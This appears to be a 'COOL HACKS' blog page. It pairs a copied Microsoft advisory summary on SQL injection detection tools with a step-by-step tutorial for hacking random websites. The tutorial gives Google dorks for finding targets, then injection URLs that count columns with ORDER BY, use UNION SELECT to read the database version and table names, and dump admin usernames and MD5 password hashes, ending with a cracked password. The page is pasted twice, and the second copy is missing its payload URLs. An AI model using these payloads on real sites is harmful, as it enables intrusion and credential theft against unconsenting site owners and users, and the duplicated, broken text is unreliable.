COOL HACKS
SQL injection SQL Injection : "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."
The MSRC released an advisory recently that discusses the recent SQL injection attacks and announces three new tools to help identify and block these types of vulnerabilities. The advisory discusses the new tools, the purpose of each, and the way each complements the others. The goal of this blog post is to help you identify the best tool to use depending on your role (i.e. Web Developers vs. IT administrators).
Web Developers Recommendations
* The Microsoft Source Code Analyzer for SQL Injection (MSCASI) is a static code analysis tool that identifies SQL Injection vulnerabilities in ASP code (ASP pages are the ones that have been under attack). In order to run MSCASI you will need source code access and MSCASI will output areas vulnerable to SQL injection (i.e. the root cause and vulnerable path is identified). In our view, fixing the root cause of the bug is the best way to eradicate vulnerabilities. MSCASI scans ASP source code and generates warnings for first order and second order SQL Injection vulnerabilities. Please refer to the SQL team’s blog and KB 954476 for more details.
IT/Database Administrators Recommendations (as well as Web developers)
We are recommending two of the new tools announced today. One can help identify SQL injection vulnerabilities by crawling the website. The other one aims to block potential SQL injection attacks by filtering malicious requests. The website crawler will be useful if you don't have access to the source code.
* Microsoft worked with the HP Web Security Research group to release the Scrawlr tool. The tool will crawl a website, simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr uses some of the same technology found in HP WebInspect but has been built to focus only on SQL Injection vulnerabilities. This will allow an IT/DB admin to easily find vulnerabilities similar to the ones that have been used to compromise sites in recent attacks. No source code is required to run this tool. From a starting URL, the tool recursively crawls that URL in order to build up a site tree that will be then analyzed for SQL injection vulnerabilities. For more information check out the HP Web Security Research blog.
* In order to block and mitigate SQL injection attacks (while the root cause is being fixed), you can also deploy SQL filters using a new release of URLScan 3.0. This tool restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from being executed on the server. It uses a set of keywords to block certain requests. If a bad request is detected, the filter will drop the request and it will not be processed by SQL. That said, if a SQL injection flaw has been identified, we highly encourage you to fix the root cause of the problem instead of attempting to produce the perfect filter (since in our view this is error prone). Please refer to one of the two IIS blog posts (1, 2) and the technical documentation for more details.
Tool Name: MSCASI
Usuage:Identifies SQL Injection vulnerabilities in ASP code through static source code analysis.
Pros:Identify the root cause of the bug at the source code level.
Cons:This version currently only works on ASP pages.
For: WEB Developers
Tool Name 2: Scrawlr
Usuage:Detect SQL vulnerability using runtime analysis by crawling a website.
Pros:No source code is required.
Cons:Cannot identify the line of code responsible
For: IT/DB Administrator,Web developers
Tool Name 3: UrlScan v3.0 Beta
Usuage: Runtime filtering that blocks the types of HTTP requests that Internet Information Services (IIS) will process.
Pros: URLScan filter can be easily deployed to mitigate SQL injection attack while the root cause is being fixed.
Cons: Not fixing the root cause, thus the risk has not been eliminated completely.
For:IT Administrators
How To DO SQL : If you are trying to hack just a random site, then there are some google dorks available which will help you. Here are some of them
allinurl:index.php?id=
allinurl:tr
ainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID= allinurl:index.php?=
inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL Injection works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
3.So the url will be like this:
http://www.site.com/news_archive.php?id=5'
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
4.The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
we move a little higher. (it doesn't matter)
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns.
5.. Now use "-" (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
we hit enter.
numbers appears..
Like this:
6
5
8
6.Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6
, 5
5.1.32 <--this is the version
7.Getting Table Name.
We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:
+from+information_schema.tables+whe re+table_schema=database()--
it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_user_md5
:9.We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10.Because the password is in md5 hash we need to crack it.
http://passcracking.com/index.php
pass : x1R0zYB3bex
Enjoy
The MSRC released an advisory recently that discusses the recent SQL injection attacks and announces three new tools to help identify and block these types of vulnerabilities. The advisory discusses the new tools, the purpose of each, and the way each complements the others. The goal of this blog post is to help you identify the best tool to use depending on your role (i.e. Web Developers vs. IT administrators).
Web Developers Recommendations
* The Microsoft Source Code Analyzer for SQL Injection (MSCASI) is a static code analysis tool that identifies SQL Injection vulnerabilities in ASP code (ASP pages are the ones that have been under attack). In order to run MSCASI you will need source code access and MSCASI will output areas vulnerable to SQL injection (i.e. the root cause and vulnerable path is identified). In our view, fixing the root cause of the bug is the best way to eradicate vulnerabilities. MSCASI scans ASP source code and generates warnings for first order and second order SQL Injection vulnerabilities. Please refer to the SQL team’s blog and KB 954476 for more details.
IT/Database Administrators Recommendations (as well as Web developers)
We are recommending two of the new tools announced today. One can help identify SQL injection vulnerabilities by crawling the website. The other one aims to block potential SQL injection attacks by filtering malicious requests. The website crawler will be useful if you don't have access to the source code.
* Microsoft worked with the HP Web Security Research group to release the Scrawlr tool. The tool will crawl a website, simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr uses some of the same technology found in HP WebInspect but has been built to focus only on SQL Injection vulnerabilities. This will allow an IT/DB admin to easily find vulnerabilities similar to the ones that have been used to compromise sites in recent attacks. No source code is required to run this tool. From a starting URL, the tool recursively crawls that URL in order to build up a site tree that will be then analyzed for SQL injection vulnerabilities. For more information check out the HP Web Security Research blog.
* In order to block and mitigate SQL injection attacks (while the root cause is being fixed), you can also deploy SQL filters using a new release of URLScan 3.0. This tool restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from being executed on the server. It uses a set of keywords to block certain requests. If a bad request is detected, the filter will drop the request and it will not be processed by SQL. That said, if a SQL injection flaw has been identified, we highly encourage you to fix the root cause of the problem instead of attempting to produce the perfect filter (since in our view this is error prone). Please refer to one of the two IIS blog posts (1, 2) and the technical documentation for more details.
Tool Name: MSCASI
Usuage:Identifies SQL Injection vulnerabilities in ASP code through static source code analysis.
Pros:Identify the root cause of the bug at the source code level.
Cons:This version currently only works on ASP pages.
For: WEB Developers
Tool Name 2: Scrawlr
Usuage:Detect SQL vulnerability using runtime analysis by crawling a website.
Pros:No source code is required.
Cons:Cannot identify the line of code responsible
For: IT/DB Administrator,Web developers
Tool Name 3: UrlScan v3.0 Beta
Usuage: Runtime filtering that blocks the types of HTTP requests that Internet Information Services (IIS) will process.
Pros: URLScan filter can be easily deployed to mitigate SQL injection attack while the root cause is being fixed.
Cons: Not fixing the root cause, thus the risk has not been eliminated completely.
For:IT Administrators
How To DO SQL : If you are trying to hack just a random site, then there are some google dorks available which will help you. Here are some of them
allinurl:index.php?id=
allinurl:tr
ainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID= allinurl:index.php?=
inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL Injection works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
3.So the url will be like this:
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
4.The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
we move a little higher. (it doesn't matter)
until we got an error:
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns.
5.. Now use "-" (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
we hit enter.
numbers appears..
Like this:
6
5
8
6.Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
and you will get a result like this:
6
, 5
5.1.32 <--this is the version
7.Getting Table Name.
We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:
+from+information_schema.tables+whe re+table_schema=database()--
it will look like this:
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_user_md5
:9.We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10.Because the password is in md5 hash we need to crack it.
pass : x1R0zYB3bex
Enjoy
